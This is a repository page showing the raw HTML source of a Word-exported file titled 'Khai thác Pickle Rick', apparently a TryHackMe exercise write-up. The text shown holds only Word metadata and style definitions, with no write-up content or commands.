Study/LearningSecurity
1
0
Fork 0
mirror of https://github.com/haudang217/LearningSecurity.git synced 2026-02-04 23:59:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
LearningSecurity/Tryhackme/Khai thác Pickle Rick .htm
haudang217 bd20832152
Add files via upload
2022-08-15 21:38:54 +07:00

3027 lines
167 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 15">
<meta name=Originator content="Microsoft Word 15">
<link rel=File-List href="Khai%20thác%20Pickle%20Rick%20_files/filelist.xml">
<link rel=Edit-Time-Data
href="Khai%20thác%20Pickle%20Rick%20_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>&#272;&#7863;ng Thanh H&#7853;u</o:Author>
<o:LastAuthor>&#272;&#7863;ng Thanh H&#7853;u</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:Created>2022-08-15T14:37:00Z</o:Created>
<o:LastSaved>2022-08-15T14:37:00Z</o:LastSaved>
<o:Pages>15</o:Pages>
<o:Words>1677</o:Words>
<o:Characters>9562</o:Characters>
<o:Lines>79</o:Lines>
<o:Paragraphs>22</o:Paragraphs>
<o:CharactersWithSpaces>11217</o:CharactersWithSpaces>
<o:Version>16.00</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<link rel=themeData href="Khai%20thác%20Pickle%20Rick%20_files/themedata.thmx">
<link rel=colorSchemeMapping
href="Khai%20thác%20Pickle%20Rick%20_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="&#45;-"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="376">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
